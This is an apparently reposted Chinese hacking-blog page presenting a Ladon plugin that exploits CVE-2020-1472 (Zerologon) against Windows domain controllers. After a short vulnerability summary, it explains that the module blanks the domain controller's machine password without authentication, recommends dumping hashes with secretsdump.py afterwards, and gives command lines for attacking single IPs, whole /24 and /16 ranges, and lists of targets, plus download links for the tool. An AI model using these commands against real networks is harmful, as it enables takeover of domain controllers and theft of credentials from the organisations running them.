记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

Ladon插件-CVE-2020-1472域控提权漏洞EXP

2020-09-16 00:33

=============================================================================================
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

漏洞简述

2020年08月12日, 360CERT监测发现Windows官方 发布了 NetLogon 特权提升漏洞 的风险通告,该漏洞编号为 CVE-2020-1472,漏洞等级:严重,漏洞评分:10分。

攻击者通过NetLogon(MS-NRPC),建立与域控间易受攻击的安全通道时,可利用此漏洞获取域管访问权限。成功利用此漏洞的攻击者可以在该网络中的设备上运行经特殊设计的应用程序。

支持版本

>= Ladon 5.0

模块类型

漏洞利用

模块功能

无需登陆验证,直接远程设置域控机器用户密码为空值。成功后用secretsdump.py读取远程机器HASH即可

插件用法

工具用法

1
python cve-2020-1472-exp.py 192.168.1.8

image

Ladon用法

1
2
3
4
5
6
Usage
Ladon target cve-2020-1472.ini
Example:
Ladon 192.169.1.8 cve-2020-1472.ini
Ladon 192.169.1.8/24 cve-2020-1472.ini
Ladon 192.169.1.8/16 cve-2020-1472.ini

如图:批量C段
image

批量IP

目录下放ip.txt,里面放入已知ip即可
192.168.1.8
10.23.4.56

1
Ladon cve-2020-1472.ini

工具下载

最新版本:https://k8gege.org/Download
历史版本: https://github.com/k8gege/Ladon/releases
插件源码:小密圈可下载

扫码加入K8小密圈


知识来源: k8gege.org/p/cve-2020-1472.html

阅读:13890 | 评论:0 | 标签:exp 提权 漏洞 CVE

想收藏或者和大家分享这篇好文章→复制链接地址

“Ladon插件-CVE-2020-1472域控提权漏洞EXP”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

ADS

标签云

本页关键词